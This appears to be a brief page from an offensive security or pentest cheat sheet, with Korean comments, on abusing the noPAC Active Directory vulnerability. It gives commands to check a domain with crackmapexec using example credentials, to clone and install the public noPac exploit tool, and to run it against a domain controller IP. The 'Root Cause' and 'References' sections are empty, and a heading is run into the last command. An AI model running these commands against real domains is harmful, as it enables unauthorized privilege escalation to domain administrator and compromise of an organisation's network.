noPAC
Abuse
# noPAC에 취약한지 확인
crackmapexec smb contoso.com -u user-A -p 'Password123!' -M noPac
# noPAC 및 라이브러리 설치
git clone https://github.com/Ridter/noPac.git
cd noPac
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
# 악용
python3 noPac.py contoso.com/user-A:'Password123!' -dc-ip 192.168.1.11 -use-ldapRoot Cause





References
Last updated